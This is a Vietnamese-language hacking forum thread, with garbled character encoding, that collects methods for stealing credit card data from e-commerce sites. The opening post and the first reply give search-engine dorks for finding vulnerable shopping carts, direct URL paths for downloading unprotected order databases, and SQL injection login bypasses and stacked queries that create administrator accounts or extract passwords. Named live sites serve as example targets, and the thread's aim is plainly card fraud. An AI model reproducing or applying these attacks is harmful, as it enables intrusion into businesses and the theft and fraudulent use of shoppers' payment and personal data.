Tổng hợp về c�ch hack CC in bom-kick...? Forum

Posts: 0

Lead

Jul 4 04 9:23 PM

Tags : :

Thường c�c hacker hack cc từ những lỗi nghi�m trọng của c�c site b�n h�ng tr�n to�n thế giới (c�n v� số những site chưa fix )...c�c lỗi thường gặp l� :
acart2_0
SalesCart Database Storage Insecurity
Trong file shopper.cgi
Cart32 Sites
VP-ASP
............
Dưới đ�y l� b�i viết chi tiết c�ch hack c�c lỗi đ�, tất nhi�n cũng ko phải tui t�m ra được c�c lỗi n�y...v� c�c lỗi n�y đựoc t�m ra rất l�u r�i...được sang qua sang lại....đến nỗi t�c giả của n� l� ai cũng ko c�n nhớ nỗi nữa...!!!
---------------------------------------------------------------------------------------------
Lỗi acart2_0" :
Đầu ti�n c�c bạn v�o http://google.com ( c�c bạn c� thể v�o c�c site t�m kiếm kh�c như http://av.com .... ) search keyword "acart2_0" ,bạn thấy rất nhiều file mắc lỗi n�y,do kinh nghiệm m�nh khuy�n c�c bạn n�n chọn những site c� dạng http://url/acart2_0/ v� dụ site http://www.coolrob.com/cart/acart2_0 ,g� th�m" /acart2_0.mdb "v�o đằng sau url, enter xong bạn thấy m�n h�nh dơnload l� th�nh c�ng r�i đ�...bạn c� thể down to�n bộ file database *.mdb của shop b�n h�ng đ�...
---------------------------------------------------------------------------------------------
Lỗi VP-ASP:
đầu ti�n v�o http://google.com search từ kho� "shopdisplaycategories" click v�o site bạn sẽ thấy l� http://www.sitename.com/shopping/sh...ycategories.asp
Việc tiếp theo l� chuyển url http://www.sitename.com/shopping/sh...ycategories.asp th�nh url http://www.sitename.com/shopping/shopdbtest.asp nghĩa l� thay shopdisplaycategories.asp bằng shopdbtest.asp rồi enter...nếu ra tiếp th�m một trang nữa...<---ko phảt l� no page .th� bạn c� cơ hội down *mdb của site n�y đ�...
sau khi ra trang mới xong,�p dụng c�ng thức http:// [vp-asp site] / [ vp-asp dir] / [ xDatabase + .mdb ]
-[vp-asp site] l� : www.sitename.com
-[ vp-asp dir] l� :shopping
-[ xDatabase + .mdb ] sẽ l� shopping.mdb
nếu c� m�n h�nh save th� bạn th�nh c�ng r�i đ�...
-----------------------------------------------------------------------------------------------
Lỗi shopper.cgi:
v�o http://google.com search từ kho� shopper.cgi hoặc shopper.execopy những url c� dạng sitename.com/cgi-bin/shopper.cgi?
sau đ� paste v�o browse v� th�m d�ng search=action&keywords=ccpower &template=shopper.conf hoặc hoặc th�m d�ng search=action&keywords=ccpower &template=order1.log v�o đằng sau,nếu may mắn bạn sẽ t�m thấy cc
-----------------------------------------------------------------------------------------------
Lỗi Cart32.exe:
v�o google.com ,search từ kh�a "Cart32.exe v3"đầu ti�n v�o http://www.sitename.com/cgi-bin/cart32.exe/sitename
Lấy Credit Cards : http://www.sitename.com/cgi-bin/car...name-ORDERS.txt
hoặc : http://www.sitename.com/cgi-bin/car...name-OUTPUT.txt
------------------------------------------------------------------------------------------------
Hack CC th�ng qua lỗi SalesCart Database Storage Insecurity:
Tổng qu�t: Lỗi n�y thực chất l� dữ liệu của c�c chương tr�nh mua b�n kh�ng được bảo mật, m� h�a hay cất giữ cẩn thận n�n bạn ho�n to�n c� thể lấy ch�ng một c�ch dễ d�ng
Lưu �: đ�i khi với thực tế, 1 số link c� thể kh�c đi, kh�ng phải l�c n�o cũng ho�n to�n đ�ng, dữ liệu c� khi bao gồm cả CRD (Credit Card) n�n mọi việc phải qua proxy (nếu kh�ng c� proxy th� c� thể ra dịch vụ...)
Khai th�c: H�y sử dụng 1 trong những link sau:
www.victim.com/fpdb/shop.mdb
www.victim.com/shoponline/fpdb/shop.mdb
www.victim.com/database/metacart.mdb
www.victim.com/shopping/database/metacart.mdb
www.victim.com/shop/database/metacart.mdb
www.victim.com/metacart/database/metacart.mdb
www.victim.com/mcartfree/database/metacart.mdb
www.victim.com/ASP/cart/database/metacart.mdb
V� dụ: site84vn.com c� thể download cc từ đ�y: www.84vn.com/database/metacart.mdb
C� nghĩa l� database kh�ng hề c� 1 ch�t bảo mật n�o cả. Download v� tư ! Trong database c� thể bao gồm: name, surname, address, e-mail, phone number, credit card number, company name.....
Bạn c� thể khai th�c dữ liệu n�y, nhưng trong thực tế, mọi việc kh�ng phải l�c n�o cũng su�n sẻ cả, bạn h�y tưởng tượng mỗi server c� một cấu tr�c ri�ng, v� dụ như đường dẫn kh�ng phải l�c n�o cũng l� fpdb/... hay như những link tr�n, h�y tận dụng lỗi v� thử từng c�i một , nhiều khi l� www.victim.com/muaban/fpdb/shop.mdb v� vậy nếu bạn x�i c�ch n�y h�y linh hoạt trong link tuỳ v�o từng site! <----copy by h4a......
------------------------------------------------------------------------------------------------
l�n google t�m từ kh�a
"inurl:commerce.cgi"
Rồi okie số địa chỉ online đang chờ đ�n
vd:
ta c� site
<http://www.warresisters.org/store/commerce.cgi>?
x�a c�i commerce.cgi? đi thay bằng Admin_files/commerce_user_lib.pl
ta sẽ được
## This file contains the user specific variables
## necessary for Commerce.cgi

$sc_sales_tax = ".0825";
$sc_sales_tax_state = "NY";
$sc_send_order_to_email = "yes";
$sc_order_log_name = "onlinebookstore.log";
$sc_send_order_to_log = "yes";
$shipping_percentage = ".15";
$sc_order_email = "wrl\@igc.org";
$sc_root_url = "http://www.warresisters.org/store";
$sc_admin_email = "lit\@warresisters.org";
$sc_domain_name_for_cookie = ".warresisters.org";
$sc_order_script_url = "https://secure.serve.com/resist/store/commerce.cgi";
$sc_root_web_path = "/home/serve/resist/Html/Products";
$sc_path_for_cookie = "/store";
$path_to_html = "../Html";
1;

x�a c�i commerce_user_lib.pl đi thay bằng onlinebookstore.log (t�m ở $sc_order_log_name ) v� ....
Việc tiếp theo l� thuộc về bạn
------------------------------------------------------------------------------------------------
V�o google g� từ kho� tek9.aspta được link c� dạng tương tự như thế n�y
https://ionicpurifier.com/tek9.asp?...ers&mode=search
bắy đầu từ /tek9.asp/ g� th�m /intranethttps://ionicpurifier.com/intranet/tek9.asp...ers&mode=search
Sau đ� đăng nhập với user v� pass 'or''='nếu may mắn th� sẽ v�o được , v� ăn cc tha hồ
c�n rất nhiều site bị lỗi n�y
------------------------------------------------------------------------------------------------
Search keyword in google.com.vn : " Shoping /admin "

http://shopping.richardhealey.com/admin_login.asp

http://families-online.org/admin_login.asp

user/pass : ' or 1=1--

Code của site cho ph�p exploit l�n SQL Server .
------------------------------------------------------------------------------------------------
Tr�n đ�y l� c�c c�ch hack cc d�nh cho newbie...gi�p bạn down *.mdb từ bất cứ site bị mắc c�c lỗi tr�n....c�n nhiều c�ch hack cc nữa...rất tốn thời giờ...c� thể ngồi cả ng�y ...m� vẫn ko kiếp ch�t được g�...hack cc n�y như l� ngồi c�u c� vậy...quan trọng l� phải biết ki�n nhẫn....
sau khi save v�o m�y ( đ� setup sẵn microsoft-access 2000 - nằm trong bộ microsoft-office) <-----chương tr�nh gi�p đọc file *.mdb
double click chuột v�o file db tr�n c�c bạn sẽ thấy rất nhiều tab, th�ng thường những th�ng tin trong tab oder l� những th�ng tin m� ch�ng ta cần t�m kiếm ( cc ), click l�n tab để view,sau khi click tab oder c�c bạn sẽ thấy rất nhiều th�ng tin, nhiều khi c� cả cc ! Ch�c bạn th�nh c�ng..

Quote Reply

8546246

Posts: 95

#1 [url]

Jul 4 04 9:34 PM

b�i n�y tớ sưu tập được của"Silvery Hat Hacker"

Ăn cắp Thẻ T�n Dụng qua lỗi SQL

Trong b�i viết n�y , Silvery Hat Hacker sẽ giới thiệu đến với bạn 10 c�ch đ�nh cắp Thẻ T�n Dụng qua lỗi Sql Injection lẫn c�c lỗi th�ng qua Google v� c�c Bug kh�c... C� thể bạn đ� bắt gặp ở đ�u đ� c�ch thức hack tương tự như trong những b�i viết n�y , nhưng v� nhiều người bạn qua Yahoo Hop thu đ� hỏi hay n�i với Silvery Hat Hacker rằng họ chưa hiểu hay chưa biết r� phải l�m sao. V� vậy Silvery Hat Hacker đ�nh viết lại 1 lần nữa chuỗi b�i viết về Hack cc n�y. Cũ c� mới cũng c� nhưng lỗi vẫn l� lỗi v� Silvery Hat Hacker đ� chọn ra v� sưu tầm từ nhiều nguồn những phương ph�p c�n c� thể th�nh c�ng để tr�nh b�y ở đ�y...

1-Th�ng qua lỗi SQL của Alabanza AlaCart :

A\M� tả :

AlaCart l� 1 trong những ứng dụng web d�ng để trao đổi v� mua b�n h�ng qua mạng của Alabanza , 1 c�ng ty chuy�n về Dịch vụ M�y Chủ tự Động H�a ( Web hosting automation ) . Trong phi�n bản đ� kiểm nghiệm ( v1.27 ) , Silvery Hat Hacker v� anh bạn đ� viết ra b�i n�y ( phi�n bản English ) đ� ph�t hiện ra lỗi ch�n đọan m� SQL v�o qu� tr�nh đăng nhập của AlaCart trong vai tr� Administrator để quản l� cơ sở dữ liệu t�an bộ th�nh phần của Web c� vấn đề. N� cho ph�p Tin tặc c� thể đăng nhập mả kh�ng cần biết Username v� Password. ( Lỗi Sql : Nếu bạn kh�ng biết v� sao h�y tham khảo ở đ�y hay c�c b�i kh�c của phần Kiến thức Cơ Bản để học hỏi th�m )

B\Tiến H�nh :

Bạn cần 1 website c�i đặt AlaCart

C�ng nghệ quản l� Mua-B�n của AlaCart nằm trong thư mục /s-car

Để bắt đầu truy v�o trang đăng nhập của Admin , ta c� thư mục /admin

=> ta sẽ c� www.t�n website.t�n miền/s-car/admin => bạn v�o được trang đăng nhập. N� sẽ xuất hiện th�ng b�o đ�i t�n truy nhập v� mật khẩu

-V� bạn đ� biết AlaCart bị SQL n�n ta sẽ d�ng c�c Username v� Password d�ng để boipass tương tự như sao : 'or''='

-V�o được cơ sở quản l� rồi. Bạn vẫn c�n kh� khăn trước mắt :

+Nh�n v�o kh�ng thấy Thẻ T�n Dụng

+T�an chữ v� chữ

Bạn đừng thất vọng , v� khi vừa v�o l� bạn đ� gặp ngay phần Giup do - Trợ Gi�p được mặc định hiển thị của AlaCart n�n click v�o c�c link ở giữa trước mắt chỉ l� t�m hiểu c�ch họat động của ch�ng chứ kh�ng phải điều khiển ch�ng. Bạn nh�n l�n c�c d�ng ngang , t�m Order Lua chon hay Order. Trong trang kế , bạn t�m d�ng :

Please enter the email address to which orders will be sent: - Xin hảy vui l�ng nhập v�o địa chỉ email m� c�c th�ng tin mua b�n sẽ được gửi đến:

-Tới đ�y kh�ng thể chỉ hơn được nữa , bạn h�y tự l�m lấy , mặc d� phải chờ đợi..Nhưng ch�c may mắn. Silvery Hat Hacker đ� lấy được rất nhiều Thẻ T�n Dụng bằng c�ch n�y rồi.

Trang v� dụ ( bạn kiếm th�m qua Google bằng từ kh�a s-cart/admin/ ) :

http://avantiparts.net/s-cart/admin/

http://64.177.121.164/s-cart/admin/

Đừng ph� qu� , tội người kh�c nha , c�c Newbies. Thanks

2-Th�ng qua lỗi SQL của VP-ASP:

A\M� tả :

C�i n�y đ� qu� quen thuộc với d�n Ăn cắp Thẻ T�n Dụng rồi. Silvery Hat Hacker chỉ n�i sơ qua th�i. Đ�y l� 1 c�ng cụ mạnh mẽ gi�p cho admin của c�c website B�n h�ng quản l� cơ sở dữ liệu của m�nh dễ d�ng hơn. Tiện lợi , nhưng VP-ASP c� cả khối lỗi cho Hackers khai th�c...Silvery Hat Hacker sẽ từ từ tr�nh b�y ch�ng l�n cho c�c bạn THAM KHẢO - chỉ mong bạn tham khảo cho biết th�i...

B\Tiến H�nh :

-SQL Injection lại tiếp tục l�m khổ c�c website...Bạn tiếp tục c� cơ hội để boipass - đăng nhập tr�i ph�p v�o vai tr� admin qua 'or''=' để "quản l�" cơ sơ dữ liệu hộ admin.

Đường dẫn để đăng nhập

www.t�n website.t�n miền/vpasp/shopadmin.asp

-1 số admin "qu�n" đổi Username v� password mặc định vpasp/vpasp hay admin/admin . Bạn c� th�m 1 cơ hội nhỏ nữa .

3-Th�ng qua lỗi SQL của Storefront:

A\M� tả :

Storefront cũng như VP-ASP , n� l� 1 hệ thống bao gồm tất cả những g� cần thiết cho việc quản l� 1 website thương mại tr�n Internet�.V� , cũng như AlaCart v� VP-ASP , Storefront bị d�nh lỗi SQL ở trang Login m� qua đ� cho ph�p hackers lấy quyền đăng nhập v�o phần quản l� của Admin m� kh�ng cần sự cho ph�p.

B\Tiến H�nh :

-Bạn v�o http://www.google.com/intl/xx-hacker/ , t�m với từ kh�a Storefront allinurl:/login.asp . Sauk hi t�m được những trang Login , bạn d�ng Username v� Password ' or 'a'='a để boipass v�o.

-Nếu như bạn đ� biết trước địa chỉ email của ai đ� , bạn cũng c� thể sử dụng n� ở đ�y theo dạng sau :

Username : địa chỉ email đ� biết

Password : ' or 'a'='a

=> Bạn v�o được phần quản l� của user sở hữu địa chỉ email tr�n. Việc lấy thẻ t�n dụng ở đ�y kh�ng c�n l� việc kh� khăn nữa.

4-Th�ng qua lỗi SQL của VP-ASP:

A\M� tả :

1 phi�n bản kh�c của VP-ASP , lỗi SQL đ� được ph�t hiện ra trong 2 trang shopTim kiem.asp v� shopdisplayproducts.asp qua đ� cho ph�p những tin tặc tạo 1 t�i khỏan Người Quản Trị mới , đổi mật khẩu của Admin trước đ� m� kh�ng cần biết password hay chỉ đơn giản l� đăng nhập tr�i ph�p để đọc thong tin b�n hang của website�Bao gồm c� thẻ t�n dụng

B\Tiến H�nh :

Như thường lệ bạn t�m trong Google�allinurl:shopTim kiem.asp hay allinurl:shopdisplayproducts.asp .

Vấn đề ở đ�y l� bạn kh�ng thể n�o boipass v�o t�i khỏan admin được như 3 c�ch tr�n m� phải thực hiện 1 số m� lệnh SQL trước ( Lưu � rằng những đọan m� sau bạn ch�n v�o ngay sau đường Link shopTim kiem.asp? ) :

A\TH�NG QUA TRANG SHOPTim kiem.ASP

I - Ch�n 1 t�i khỏan v�o Database :

-C�u lệnh :

Keyword=&category=5); insert into tbluser (fldusername) values ('t�n t�i khỏan')--&SubCategory=&hide=&action.x=46&action.y=6

-V� dụ :

http://www.birnsandsawyer.com/webcart/shop...d=&category=5); insert into tbluser (fldusername) values ('silveryhat')--&SubCategory=&hide=&action.x=46&action.y=6

II - Thiết lập mật khẩu cho t�i khỏan đ� c� :

-C�u lệnh :

Keyword=&category=5); update tbluser set fldpassword='mật khẩu' where fldusername='t�n t�i khỏan'--&SubCategory=All&action.x=33&action.y=6

-V� dụ :

http://www.birnsandsawyer.com/webcart/shop...d=&category=5); update tbluser set fldpassword='87fzvwek' where fldusername='silveryhat'--&SubCategory=All&action.x=33&action.y=6

III � Thiết lập quyền truy cập của t�i khỏan ( ở đ�y cho l� quyền của người quản trị cho n� oai ) :

-C�u lệnh :

Keyword=&category=3); update tbluser set fldaccess='1 - đ�y l� quyền của admin' where fldusername='t�n t�i khỏan'--&SubCategory=All&action.x=33&action.y=6

-V� dụ :

http://www.birnsandsawyer.com/webcart/shop...d=&category=3); update tbluser set fldaccess='1' where fldusername='silveryhat'--&SubCategory=All&action.x=33&action.y=6

Đ� l� 3 h�ng lệnh m� bạn n�n biết khi bắt đầu hack v�o VP-ASP qua trang shopTim kiem.asp. Tất nhi�n n� c�n v�i c�u lệnh nữa, nhưng Silvery Hat Hacker kh�ng muốn thực h�nh ở đ�y , bạn h�y xem sơ qua c�u lệnh :

IV\Đổi password 1 t�i khỏan :

Keyword=&category=5); update tbluser set fldpassword='mật khẩu mới' where fldusername='t�n t�i khỏan'--&SubCategory=All&action.x=33&action.y=6

V\Xem mật khẩu của 1 t�i khỏan :

cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='t�n t�i khỏan'%20and%20fldpasswo rd%20like%20'a%25'�

B\TH�NG QUA TRANG SHOPDISPLAYPRODUCTS.ASP

-N�i thật ra th� Silvery Hat Hacker cũng chưa nắm r� về phương ph�p n�y cho lắm v� chưa c� cơ hội thực h�nh với trang shopdisplayproducts.asp. Tuy nhưng Silvery Hat Hacker tin chắc n� c� li�n quan đến việc Xem mật khẩu của t�i khoản ở tr�n.

http://t�n website/vpasp/shopdisplayproducts.asp?cat=qwerty' union%20select fldauto,fldpassword%20from%20tbluser%20where fldusername='admin'%20and%20fldpassword%20like%20'a%25'--

Bạn thay lần lượt d�ng cuối c�ng ( m�u xanh l� c�y ) bằng :

%20'a%25'--

%20'b%25'--

%20'c%25'�

�

Lỗi n�y được th�ng b�o cho VP-ASP ng�y 28/11/2003

5\Lỗi đường dẫn của ProductCart :

A\M� tả :

-ProductCart một sản phẩm đầu tay của h�ng Early Impact, n� gi�p cho người quản trị website b�n h�ng trực tuyến dễ d�ng điều khiển thiết lập hay tinh chỉnh t�nh năng v� tiện �ch trong Website của m�nh 1 c�ch trực quan v� dễ hiểu qua giao diện quản l� rất th�n thiện. Tuy kh�ng thể so s�nh với VP-ASP , 1 cao thủ trong số c�c phần mềm b�n h�ng trực tuyến với h�ng trăm website sử dụng v� h�ng chục Bug lỗi trong đ�. V� thế , ở đ�y, ProductCart chỉ l� hạng lon con với 1 lỗi duy nhất, cực kỳ nguy hiểm. Qua lỗi n�y, Silvery Hat Hacker c� thể trực tiếp đưa về m�y m�nh mười mấy Megaboites Credit Cards v� th�ng tin về kh�c mua h�ng trong Website đ�. Lỗi đường dẫn diễn ra, nghĩa l� ch�ng ta kh�ng cần biết Website đ� như thế n�o, tr�ng ra sao, b�n trong c� thư mục g�, h�nh ảnh thế n�o....nhưng vẫn c� thể tải 1 số thẻ t�n dụng về m�y m�nh trơn tru, �t bị ph�t hiện v� Admin c� thể kh�ng x�c định được đ� c� người gh� thăm nh� m�nh v� b� c�i k�t sắt ( Credit Cards ) về l�m của ri�ng đ�u...

B\Tiến h�nh :

-Hầu hết ch�ng ta đều d�ng c�ng cụ Google để t�m kiếm 1 th�ng tin hay t�i liệu website n�o đ� nhằm cho nhiều mục đ�ch vui chơi v� học tập. Thế nhưng , b�n cạnh đ� Google cũng t�i sản v� gi� của Hackers khi n� trở th�nh mục ti�u trung gian để khai th�c, x�m nhập bất hợp ph�p v�o khu vực của 1 Website n�o đ� m� người d�ng b�nh thường kh�ng thể biết. Chỉ với 1 từ kh�a đơn giản, th�ng tin quan trọng về Webmaster,người đ� c� thể bị lộ, chỉ với 1 từ kh�a đơn giản, password của ai đ� c� thể bị mất, v�, chỉ với 1 từ kh�a đơn giản, bạn c� thể download cả Database - tập tin quản l� dữ liệu chứa h�ng chục Credit Card ch�a về m�y m�nh m� kh�ng cần phải v�o xem mặt Website đ�. Tương tự như ở đ�y, ProductCart bị mắc lỗi ở việc quản l� đường dẫn đưa tới nơi lưu trữ Database cực kỳ nguy hiểm m� cho ph�p ch�ng ta l�m c�ng việc Silvery Hat Hacker n�i ở tr�n.

-Trong qu� tr�nh thực h�nh theo b�i viết n�y, Silvery Hat Hacker sẽ kh�ng chịu bất kỳ tr�ch nhiệm n�o do bạn g�y ra l�m ảnh hưởng đến nh�n d�n trong cộng đồng Internet n�y, ch�nh bạn sẽ l� người g�nh hết mọi hậu quả khi c� vấn đề li�n quan đến ph�p luật. Nếu bạn kh�ng chắc về những g� m�nh l�m, Silvery Hat Hacker đề nghị bạn đ�ng của sổ tr�nh duyệt hiện tại, x� bỏ tờ giấy nếu bạn c� bản in của t�i liệu n�y trước khi mọi chuyện do bạn l�m trở n�n tồi tệ hơn.

-Ah, bạn kh�ng l�m theo Silvery Hat Hacker n�i ở tr�n �h ? Sau khi đọc hết d�ng chữ bạn đang đọc n�y nghĩa l� bạn đ� đồng � với luật lệ Silvery Hat Hacker n�i ở tr�n v� chấp nhận liều mạng. Ta h�y bắt đầu vấn đề ch�nh :

+Bạn v�o http://www.google.com/intl/xx-hacker/ , t�m với từ kh�a sau Allinurl:/productcart/ . H�ng lọat link web sẽ xuất hiện trong cửa sổ kết quả của Google. Bạn chọn đại 1 link n�o đ� ở trang thứ 3 hay 4 trở đi. Silvery Hat Hacker chọn http://store.klas-fm.firstmediaworks.com/ để l�m dẫn chứng minh họa.

+C� được 1 trang web d�ng ProductCart , vấn đề kế tiếp bạn l�m th�m v�o t�n của sản phẩm n�y sau link web :

http://store.klas-fm.firstmediaworks.com/ProductCart

+Chẳng c� g� xảy ra ngọai trừ v�o website nếu bạn click link đ� phải kh�ng ? Nhưng nếu, dừng lại suy nghĩ gi�y l�t, bạn biết thẻ t�n dụng thường được chứa trong Database để dễ quản l� phải kh�ng ? Vậy n� thường chứa ở đ�u trong website b�y giờ ?... Silvery Hat Hacker thử lấy đại biệt danh của tập tin chứa Credit Card n�y th�m v�o link :

http://store.klas-fm.firstmediaworks.com/P...ctCart/Database

+Tự nhi�n c�i thấy vui n�n viết d�ng n�y.

+Nếu bạn chưa thấy được Database th� để Silvery Hat Hacker gi�p vậy, bạn th�m EIPC.mdb v�o nơi tận c�ng link sau khi đ� qua c�c giai đọan ở tr�n, ta c� v� dụ :

http://store.klas-fm.firstmediaworks.com/P...tabase/EIPC.mdb

+Thử click Refresh hoặc Go tr�n tr�nh duyệt. Chẳng thấy g� xảy ra cả, tự nhi�n bắt tải tập tin g� đ� gần 2.24 Mb về m�y với đu�i mdb. Mở ra h�ng đống cột v� b�ng như Credit Cards, Customers, Admin, Orders.....

C\T�m gọn:

-Đối tượng : ProductCart của h�ng Early Impact.

-Phi�n bản : Kh�ng r�.

-Đối tượng c� li�n quan : tr�nh t�m kiếm Google.

-Mức độ lỗi : Nguy hiểm cho người mua h�ng ở Website đ�.

+Khả năng lấy được Credit Card : 3.5/5

-C�ng thức - C�ch khai th�c gồm c� :

http://www.t�n website d�ng ProductCart.t�n miền/ProductCart/Database/EIPC.mdb

-Được g� ?

Tập tin chứa Credit Cards của Website đ�.

-Vấn đề lớn nhưng cũng hơi nhỏ : c� thể Database bị m� h�a !

-Hướng giải quyết : T�m tr�nh giải m� bằng Google

B�i viết đến đ�y chấm dứt. T�y v�o khả năng mỗi bạn m� c� thể hack được hay kh�ng. Nhưng vấn đề ch�nh ở đ�y l� c�ch giải m� nếu database bị m� h�a m� th�i. Silvery Hat Hacker đ� thử viết 1 tr�nh nhưng cho ra kết quả Credit Card 1 nơi , t�n 1 nơi, địa chỉ lại ở nơi kh�c n�n th�i, bạn n�n v�o Google v� t�m tr�nh giải m�. C� lẽ qua c�u lệnh như : Mdp Decoder chẳng hạn.

B�i phụ :

I\Lỗi đường dẫn Fpdb của 1 tr�nh quản l� mua h�ng trực tuyến :

+T�m trong Google với từ kh�a sau :

allinurl: /fpdb/

+V�i chục trang sẽ xuất hiện, Silvery Hat Hacker đưa v� dụ sau :

http://home.cfl.rr.com/pcscap/Fpdb/

+Trong cửa sổ mới, bạn chọn t�y lọai mdb m� tải về.

+Khả năng lấy được Credit Card : 3/5

I\Lỗi đường dẫn shop.mdb của 1 tr�nh quản l� mua h�ng trực tuyến :

+Lại l� Google th�i bạn :

allinurl: shop.mdb

+V�i chục trang sẽ lại xuất hiện, Silvery Hat Hacker cũng đưa v� dụ chứng minh :

http://www.thomas.edu/larochelle/cs116/200...ckey%20Shop.mdb

http://www.staff.sbc.edu/kcook/classfiles/...0Pet%20Shop.mdb

+Khả năng lấy được Credit Card : 1.75/5

user posted image

Quote Reply

cavoicon

Posts: 183

#2 [url]

Oct 25 04 4:07 AM

dai` qua' ! kho' hieu~ qua' !

Quote Reply

dungsi

Posts: 162

#3 [url]

Dec 20 04 11:03 PM

neu nhu ko lam thi nhung kinh ngyiem nay da tung lam dien dao cua ca "the gioi" nhung 1 so it website chua "fix" het dau nen van con su dung duoc day ! co the co phien ban moi hon roi !
cam on cac thanh vien da co gang post nhung bai "tam co" nhu vay !

Quote Reply

credit01

Posts: 1

#4 [url]

May 20 09 8:46 AM

Kho hieu qua, nhung dau sao cac hacker deu la nhung nguoi rat thong minh. Gia nhu ho dung lam nhung viec bat chinh ma van dung tri oc cua ho de phuc vu cho dat nuoc nhi.

simulation rachat credit

Quote Reply

seller125

Posts: 1

#5 [url]

Sep 8 10 10:16 AM

rất muốn, nhưng thử ho�i chả đc con cc n�o !!
Bro n�o cho c�i yahoo để m�nh hỏi th�m về cc k� - đang muốn hack cc kiếm �t ăn học � m� :))

Quote Reply

DIỄN ��N

Tổng hợp về c�ch hack CC

Quick Reply